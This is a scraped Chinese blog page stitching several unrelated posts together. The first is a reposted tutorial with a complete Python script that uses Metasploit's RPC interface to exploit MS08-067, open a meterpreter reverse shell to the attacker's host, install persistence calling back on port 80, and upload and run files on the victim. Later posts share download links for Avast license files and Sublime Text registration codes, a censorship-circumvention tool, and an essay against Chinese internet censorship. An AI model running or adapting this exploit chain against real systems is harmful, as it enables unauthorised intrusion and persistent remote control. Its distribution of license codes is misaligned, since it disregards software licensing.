pymsf是著名安全研究团队Spiderlabs实现的一个Python与Metasploit msgrpc进行通信的python模块，通过它，你可以利用Python玩转渗透测试框架Metasploit。

使用步骤

首先你需要先启动msgrpc服务，命令如下:

load msgrpc Pass=<password>

与msgrpc进行通信其实就是与msfconsole进行通信，首先你需要创建一个msfrpc的类,登录到msgrpc服务器并且创建一个虚拟
的终端,然后你就可以在你创建的虚拟终端上面执行多个命令的字符串.你可以调用模块的方法与console.write执行命令,并且通
过"console.read"从虚拟终端上面读取输入的值.这篇文章将演示如何使用pymsf模块并且如何开发出一个完整的脚本.

这里有一个函数它创建了一个msfrpc实例,登录到msgrpc服务器,并且创建了一个虚拟终端.

def sploiter(RHOST, LHOST, LPORT, session):     client = msfrpc.Msfrpc({})     client.login('msf', '123')     ress = client.call('console.create')     console_id = ress['id']

下一步就是实现把多个字符串发给虚拟终端,通过console.write和console.read在虚拟终端显示与读取:

## Exploit MS08-067 ## commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
""" print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands]) res = client.call('console.read',[console_id]) result = res['data'].split('\n')

上面的这一小段代码创建了一个MSF的资源文件,这样你就可以通过"resoucen
"命令去执行指定文件里面中一系列的命令。

下面我们将通过"getsystem"命令把这个文件的提权,建立一个后门打开80端口来转发.并且永久的运
行.最后上传我们的漏洞exp并且在命令模式下面悄悄的安装:

# 这个函数会创建一个MSF .rc文件 def builder(RHOST, LHOST, LPORT):      post = open('/tmp/smbpost.rc', 'w')      bat = open('/tmp/ms08067_install.bat', 'w')      postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""      batcomm = "ms08067_patch.exe /quiet"      post.write(postcomms); bat.write(batcomm)      post.close(); bat.close()

通过上面的那段代码,将会创建一个.rc的文件.通过msf模块“post/multi/gather/run_console_rc_file”在当前
的meterpreter会话中运行生成的文件,并且通过console.write命令从虚拟终端写入数据,通过console.read命令来回显返回内容:

## 运行生成的exp ## runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""      print "[+] Running post-exploit script on: "+RHOST
     client.call('console.write',[console_id,runPost])      rres = client.call('console.read',[console_id]) ## Setup Listener for presistent connection back over port 80 ##      sleep(10)      listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
""" print "[+] Setting up listener on: "+LHOST+":80" client.call('console.write',[console_id,listen]) lres = client.call('console.read',[console_id]) print lres

上面代码中的变量(RHOST, LHOST,
LPORT等)都是通过optparse模块从命令终端输入的,完整的脚本托管在github上面,有时候你需要知道脚本的生成的地方都是静态地址,不会
在其他的目录生成,例如ms08067的补丁就会在你的/tmp/目录下面。

大家只要知道基础然后对下面的代码进行一定的修改就可以编程一个属于你自己的
msf自动化攻击脚本,我们建议通过博客里面发表的一些简单的例子出发,然后自己写一个msf攻击脚本:

import os, msfrpc, optparse, sys, subprocess from time import sleep # Function to create the MSF .rc files def builder(RHOST, LHOST, LPORT):      post = open('/tmp/smbpost.rc', 'w')      bat = open('/tmp/ms08067_install.bat', 'w')      postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""      batcomm = "ms08067_patch.exe /quiet"      post.write(postcomms); bat.write(batcomm)      post.close(); bat.close() # Exploits the chain of rc files to exploit MS08-067, setup persistence, and patch def sploiter(RHOST, LHOST, LPORT, session):      client = msfrpc.Msfrpc({})         client.login('msf', '123')         ress = client.call('console.create')         console_id = ress['id'] ## Exploit MS08-067 ##      commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""      print "[+] Exploiting MS08-067 on: "+RHOST
     client.call('console.write',[console_id,commands])      res = client.call('console.read',[console_id])      result = res['data'].split('\n') ## Run Post-exploit script ##      runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""      print "[+] Running post-exploit script on: "+RHOST
     client.call('console.write',[console_id,runPost])      rres = client.call('console.read',[console_id]) ## Setup Listener for presistent connection back over port 80 ##      sleep(10)      listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""      print "[+] Setting up listener on: "+LHOST+":80"      client.call('console.write',[console_id,listen])      lres = client.call('console.read',[console_id])      print lres def main():         parser = optparse.OptionParser(sys.argv[0] +\
        ' -p LPORT -r RHOST -l LHOST')         parser.add_option('-p', dest='LPORT', type='string', \
        help ='specify a port to listen on')         parser.add_option('-r', dest='RHOST', type='string', \
        help='Specify a remote host')         parser.add_option('-l', dest='LHOST', type='string', \
        help='Specify a local host')      parser.add_option('-s', dest='session', type='string', \
        help ='specify session ID')      (options, args) = parser.parse_args()      session=options.session
     RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT
     if (RHOST == None) and (LPORT == None) and (LHOST == None):                 print parser.usage  

                    sys.exit(0)      builder(RHOST, LHOST, LPORT)      sploiter(RHOST, LHOST, LPORT, session) if __name__ == "__main__":       main()      



    转自：FreeBuf 

为你的网站添加一个趣味时钟，应该会为你的网站增添不少颜色哦，

就像我网站右侧的这个趣味时钟，很好看有木有，还支持自定义DIY哦，前提是你会swf编辑哦。

使用方法：

JavaScript：

<script charset="Shift_JIS" src="https://mrxn.net/code/pub/honehone_clock01.js"></script>  

 直接解在你需要使用的地方插入这段js代码就可以了哦，比如侧边栏，很方便的。

[该文章已加密，请点击标题输入密码访问]

avast是什么，没必要说，不知道也就不用看了。

博主一直用的， 个人感觉还可以的。

下面是avast网络安全软件到2016年5月1日的截图：

下面是avast高级版的截图：

最后提醒大家，最好使用官方的正版授权的软件，这些许可文件仅用于学习使用，禁止商用，否则后果自负。

下载地址：

国内网盘： 链接: http://pan.baidu.com/s/1hqtLX0w 密码: w5s7  请低调！

国外网盘：（等到国内网盘挂了再说吧）

 多的就不介绍了，反正是更新，现在能用的哦。

安卓,苹果,Mac,Windows 三平台支持的，免费加速器下载 2020最新可用 下载链接：点击下载

链接：http://pan.baidu.com/s/1bnheP7D 密码：bl45

防止和谐，附上国外的网盘链接：

MEGA的链接：https://mega.co.nz/#!6IZjCLZI  

秘钥：5LC7uCwx49IEzlK7EIDMEq5w-0Vvg4pGoOvz1p6w26Q

把网盘内的软件fg752p.exe放在 FirefoxFG/FG目录下后，打开即可使用。

不知道的请查看我的另一篇文章：https://mrxn.net/tools/fanqiang.html    中间有介绍的。

安卓,苹果,Mac,Windows 三平台支持的，免费加速器下载 2020最新可用 下载链接：点击下载

       废话不多哈  ，打开 Mrxn福利之谷歌搜索  即可任性的使用google搜索了。

在次说明：只能应用于学习研究，不能干非法的事情哈，与我无关！

下面是搜索结果效果图（鼠标点击放大）：

进入 Mrxn Online App 第六条即可看见 使用google搜索的地址哦！

While the truncheon may be used in lieu of conversation, words will always retain their power. Words offer the means to meaning and for those who will listen, the enunciation of truth.

这几天逛知乎，发现都是这种问题，铺天盖地的，到处都在问：哎哎哎，为什么被封了啊；你有什么看法？

我有看法，可我不敢说……

好，下面我来说说我的看法。

各位亲爱的网友，非常抱歉，你来自天朝，嗯，我大天朝。广电总局说封，封了。工信部说墙，墙了。我有一个小小的问题，请问我们的自由在哪里？作为互联网建立的初衷：free open share在哪里？都TM被你吃了是不是？

有的人说，嗯，我们应该支持正版。是，没错，我们要支持正版，在我经济条件允许的情况下我肯定会支持正版，还有人说，这是国外要我们保护他们的版权，和广电没关系。呵呵。那么请问，生活大爆炸，搜狐买的正版版权，东西呢？东西被你吃了？

墙的建立，还有广电的审查，目的是什么？为什么好多人要自称 愚民 呢。我觉得愚民这个词非常的有意思啊。在zf找你的时候，你可以高呼：我是愚民，不要搞我。嗯，然后他们就不搞你了。我也是愚民！我不查资料，我只用百度，我不知道世界上Alexa排名第一的网站是谷歌（谷歌什么烂公司，早都倒闭了吧？你看，连首页都上不去）。我也不知道weibo是抄twitter的，我同样不知道朋友网人人网是抄facebook的，我也不知道weibo也在某种程度上抄facebook，我更不知道zf把fb和ins封了之后某些人还能继续上。

我什么都不知道，不知者无罪。

前几年，CCAV6放《V for Vendetta》的时候，还引起过轰动，引起过争议，让我们一下子觉得有了信心，嗯这个国家还有救。

现在，回过头看看？还是那样。一群专家，那样审查。且不说封了美剧，喜洋洋与灰太狼这种国产动漫被评为暴力，禁播。专家称：小孩子看了根本把持不住。

专家，请问你是不是看到红太狼拿着平底锅然后立马就射了一裤裆？

幹！

多少电影，多少电视剧，多少动漫，在电视上是看不到的。难道我不愿意买正版吗？难道我不愿意去电影院看一场未闻花名的剧场版或者轻音部的剧场版吗？你倒是给我放啊。呵呵。

再说说最近，全国都在背《社会主义核心价值观》。嗯，价值观。价值观这种东西是背出来的吗？价值观这种东西是你背了时候就可以接受的吗？难道全国的人都不长脑子？全国的人都能够非常愉悦的接受这种莫须有的价值观？

问一个非常现实的问题，12条里面，哪一条实现了？反正我是想一想有什么不满的，我们还缺什么，很快就背下来了。

呵呵。我的一个政治老师曾经说过，一个国家，所大力宣扬的东西，绝对是他所缺少的，这就是为什么感动中国存在了。正因为他缺少，所以他才大力宣扬。为什么不大力宣扬“人多力量大？”，因为人本来就很多，已经很多，反倒是在搞计划生育。所以说，这种东西，笑一笑就好，该懂的人懂得，不懂的人就让他幸福的生活吧，无知是福，真的。

所以看一看，其实还是闭关锁国。我们不敢让外来的文化对我们的传统文化进行挑战，不敢进行交流，互联网产业不敢放外国的公司进来。在谷歌没被墙的时候，没有几个用百度的吧。放进来试试，多少公司都得死。

思想上的闭关锁国比经济上的、外交上的来的更可怕，更难以让人察觉，最后的结果更为严重。

于是，从秦始皇一直到清朝，几千年来的教训依然没有让上面的人明白。依然这样做，控制人民的思想，和焚书坑儒不是一样的吗？只是一个手段强烈点一个温和点，一个让你知道，坑的就是你，一个不告诉你，悄悄的掐断了你和世界交流的途径——老老实实做人，踏踏实实做事。然后就俯首甘为孺子牛为国家奉献自己的一切。

“我是党的人，我的血是为党流的。党让我一次把血流完，我就一次把血流完；党让我慢慢流，我就慢慢流，流到死为止。”

当初，他们……我没有说话，因为……
后来，他们……我还是没有说话，因为……
再后来，他们……我依然没有说话，因为……
最后，他们……已经没有人能为我说话了。

不在沉默中爆发，就在沉默中灭亡。醒醒吧。

几年以前，我曾经嘲笑过某科技界大佬。当时他说：也许90后、95后会慢慢不知道Google是什么网站。

那一年，这对于我来说简直就是世界上最好笑的笑话。谷歌，全世界最卓越的互联网公司，活在互联网的一代中国人，会不知道他们的网站？

今天，我收回这句嘲笑。因为这件不可能的事，它慢慢变成了现实。

没有人再关注什么谷歌不谷歌。对他们来说，百度也蛮好用的，反正他们几乎没用过谷歌。没有谷歌又怎样？大家还是开心的刷微博，看微信，听歌，看娱乐节目。对于从来就不知道谷歌的人来说，少了谷歌又有什么影响？

多年前，我们也是可以登陆Facebook的。其实这个网站和校内一样，也挺蠢的。可在上面你能看到老外们的生活，可以轻易的跟一万公里以外的人互相拜访，可以看到很多根本不会开到校内上的主页。你用汉语回复，下面给你聊起来的可能是香港仔，可能是台湾人。你用英语回复，说不定有比你英语用的更蹩脚的寂寞的北欧人来跟你搭讪。你感觉地球真的变成了地球村，你还没拉门走出去，别人就推门走了进来。

然后，它就没有了。起初，它的失踪激起了很大的声音，后来，声音就消失了。

多年前，我们也是可以登陆Twitter的。其实这个网站和微博一样，也不过是些信息流，刷上一整天，也不见得有什么用处。但至少，你可以以最快速度获取你想知道的任何新事，你会真正了解什么事情在全世界是流行的，而不是经过各种截图、翻译、转发，甚至曲解、断章取义、黑白颠倒的东西。你知道的是真相，赤裸裸的，也许有点太短的真相。但至少中间不会有无数人的加工与再加工，偏激、片面，就在这个过程中产生了，不管后来者有意还是无意。

然后，它就没有了。首先是它的本体没有了，然后它的模仿者也没有了，模仿者的模仿者也没有了。只剩一个模仿者的模仿者的模仿者，现在你每天能在上面看到无数广告。

多年前，我们也是可以登陆YouTube的。对于有的人来说，这个网站就是个大型优酷，当年有人信誓旦旦的说，没有YouTube，我们中国人会很快让优酷超过YouTube。可这么多年过去了，视频还是那么卡，内容还是那么垃圾，原创还是那么容易被盗窃，视频丰富度还是那么的可怜。在YouTube上，你能看到全世界最棒的手艺人，最逗乐的笑话，最天马行空的创意，最激荡人心的音乐，最美好的完美瞬间，可在优酷上，你想看一分钟视频，请先看半分钟广告。

哦，对了。Instagram，有些人可能感觉它和QQ空间也差不多。可我在上面关注了六百多个摄影师，它们都是顶好顶好的影像记录者，每天看他们的作品，我感觉到很幸福，那种即使没有到那里去，也身临其境的幸福。我还在上面认识了一个日本的爱自拍的帅小伙，一个爱喝酒的韩国大叔，一个十年前到过中国今天会在每张我发的紫禁城照片下点赞的美国大爷，一个美丽无比的俄罗斯妹子，我和他们基本上都难以交流，语言是很大的障碍，但几个简单的单词，心意也就到了，这种感觉，有时候比多年老友相聚还兴奋。因为这是人类不同族群自由交流互相沟通的过程，这种过程很神奇，真的很神奇。

可现在，它没有了，它之所以没有就因为在某个特定的时间你在搜索特定的词汇时，会搜出来特定的照片。虽然这么搜的人并不多，虽然看到的人也不会大惊小怪，也不会觉得天黑了，天亮了，天要塌了，天要变了。可它就是没了，Instagram，就这么没了。谷歌也是这么没的，Twitter也是这么没的，Facebook也是这么没的。不知道是什么人，在什么场合，说了什么话，下了什么决定。就要有超过十亿人像陷于哥谭市的孤岛里一样，看着一座又一座桥梁被炸掉，又被炸掉，又被炸掉，然后，就什么都没了。

我时常觉得悲哀，真的好悲哀，一个我根本不认识也不知道是谁的人，也许是一个群体，在不断抢走我身边的东西，而我却无能为力。我抱怨一声，他听不到，任何人都听不到。我怒吼一句，身边的大多数人却像看疯子一样的看着我。我哀嚎一声，这声音被阻碍在黑黑的幕墙以里。我发出尖锐的嘶吼，这声音传不了多远，就和我那被抢走的东西一样，消失了，不见了，就像从来没存在过一样。

对于本来就没存在过的东西，有谁又会觉得在意呢？那些本来拥有又被掠夺的人的哀愁，后来的人又怎么懂呢？我曾经是拥有一切的，我曾经是拥有世界的，我站在这片土地上，呼吸的是自由的空气，饮下的是自由的琼浆玉液。就在长的无法计数的时间里，我自由生命的一部分又一部分就这么被杀死了，突然就杀死了。可我还始终觉得，它们还奄奄一息的活着，就像它们是慢慢的死去的一样。

可它们终归是死了，而且随着它们的死，愈来愈多的事情慢慢的发生了，很慢很慢，几乎不被人察觉，可还是发生了。

没有谷歌，我可以用百度呀。可某些结果被越挪越后，越挪越后，最后就不见了。就像本来就不该搜出这个结果一样。

没有Facebook，我可以用校内呀。可你想发只有在Facebook上能发的文章，很快在校内上就失踪了。接着，校内变成了人人，话题变成了人人都关心的话题。大家都在抢着看星座、明星、八卦、娱乐。没有人会关心什么消失了，反正它们本来也没多少存在感。

没有YouTube，我可以用优酷呀。可你却经常只能在优酷上看到抄袭别人的作品，而且还不署名，而且还洋洋得意，而且还自我陶醉，就好像那个idea本来属于他自己一样。你看了还要惊呼，他是如此的有创意！好一个抄袭的创意，可你却不知道，因为你不知道这个世界上有个网站叫YouTube。

没有Twitter，我还可以用微博呀。可你想知道最近发生了什么，你搜的越勤快，越能看到越明显的“根据相关法律法规，相关搜索结果不予显示”。时间长了，你想，反正知道了也没什么用，不如不看了。
慢慢的，一扇又一扇的门关上了。

今天你打开世界上最大的博客网站，发现它没了。明天你一看，世界上最好的设计师分享网站没了，一开始是刷新的很慢很慢，后来它就没了。过两天再一看，平常每天都会读两篇文章的媒体网站没了，那里的文章缤纷多彩，最后都变成了该页无法显示几个字。再过几个月，大学的网站不让上了，摄影师的网站不让上了，就连百度日本这种自家网站，也没了。

接着，漫画看不了了，接着，动画看不成了。接着，美剧英剧失踪了。下载美剧英剧的网站又又又又又失踪了。尊重正版，保护权益，行吧，然后字幕网站也没了。

游戏没了，你习惯性登陆的游戏网站，发现下载栏正在整治中。论坛关了，天天都在看的论坛，突然接到相关部门的电话，因为“报备问题”不让办了。个人网站，私人博客，对不起，说没就没有，你在上面存了多少多年辛勤耕耘的东西都没用。

你关注的人，有一天你登陆微博，发现他怎么好久都没说话了，然后你搜索了一下，发现他的账号不存在了，而且你搜他的名字，他的名字未予显示。

一盏一盏的灯，灭了。四面八方的光源，消失了。我们生活的五光十色的世界，变成了一片黑色。
天黑了，那么睡觉吧，但愿长醉不复醒，卧槽泥马勒戈壁。

最后，我们变成了一群做梦的人，这个梦的名字，叫根据相关法律法规，相关搜索结果不予显示梦。

作者 小海，原帖地址 http://www.douban.com/people/xseac/notes

Mrxn今天给大家分享一款性感的代码编辑器,程序员,屌丝必备.O(∩_∩)O哈哈~

代码编辑器或者文本编辑器，对于程序员来说，就像剑与战士一样，谁都想拥有一把可以随心驾驭且锋利无比的宝剑，而每一位程序员，同样会去追求最适合自己的强大、灵活的编辑器，相信你和我一样，都不会例外。

我用过的编辑器不少，真不少～ 但却没有哪款让我特别心仪的，直到我遇到了 Sublime Text 3 ！如果说“神器”是我能给予一款软件最高的评价，那么我很乐意为它封上这么一个称号。它小巧绿色且速度非常快，跨平台支持Win/Mac/Linux，支持32与64位，支持各种流行编程语言的语法高亮、代码补全等，但它有着很多其他编辑器没有的超酷的特性，让它的好用达到了前所未有的程度……

曾经有人说过，世界上有两种编辑器，好用和不好用的；而在好用的编辑器中，又分两种，免费的和死贵死贵的。譬如说 VIM 和 TextMate，就是免费和死贵的典型。很不幸，今天的主角 Sublime Text 3 也是个死贵死贵的代表，它是一款收费的商业软件，个人授权费高达 Total: USD $70(70美元=438.3190元)。



不过大家不用慌，虽然它很贵，但作者很厚道地给用户们提供了免费无限制无限期的试用权，它只会偶尔提醒一下你木有购买，而且频率也很低，仅此而已，一直免费使用下去几乎是没有任何影响的。另外值得一提的是，用户购买一个授权即可同时在不同平台上使用，对于像我这种经常需要在 Mac 和 Win 之间切换使用的用户来说的确能省下一笔钱了。



SublimeText3 支持但不限于 C, C++, C#, CSS, D, Erlang, HTML, Groovy, Haskell, HTML, Java, JavaScript, LaTeX, Lisp, Lua, Markdown, Matlab, OCaml, Perl, PHP, Python, R, Ruby, SQL, TCL, Textile and XML 等主流编程语言的语法高亮。ST2 拥有优秀的代码自动完成功能 (自动补齐括号，大括号等配对符号；自动补全已经出现的单词；自动补全函数名)，非常智能；另外 ST3 也拥有代码片段（Snippet）的功能，可以将常用的代码片段保存起来，在需要时随时调用。当然，语法高亮、代码折叠、行号显示、自定义皮肤、配色方案等这些已经是一款现代编辑器应有的标配功能了，所以这里就不多做介绍了。

下面说一下注册和汉化的方法:

从官方下载: http://www.sublimetext.com/3 

或者是从我分享的网盘(64位的ST3安装包+注册码+汉化包)下载:  http://pan.baidu.com/s/1sjK7I6T  

下载后直接安装好就行,首先是注册,如图操作就行:

把注册码复制一个粘贴到里面就行

汉化很简单的:

我们在界面点击Preferences-->Browse Packages打开文件浏览包

打开以后返回当前文件的上一层目录

点击Installed Packages进入安装包文件夹里

把刚我们下载好的汉化包文件解压打开里面有一个Default.sublime-package文件，把该文件复制到我们上步打开的Installed              

Packages文件夹里面，到此汉化完成了。

 如果还有不懂得就请打开:http://jingyan.baidu.com/article/ce09321b22fc7d2bff858f87.html 自行查看.

看一下吧,中文界面的了:

注:Mrxn只是分享,并非原创,原文在朽木的博客.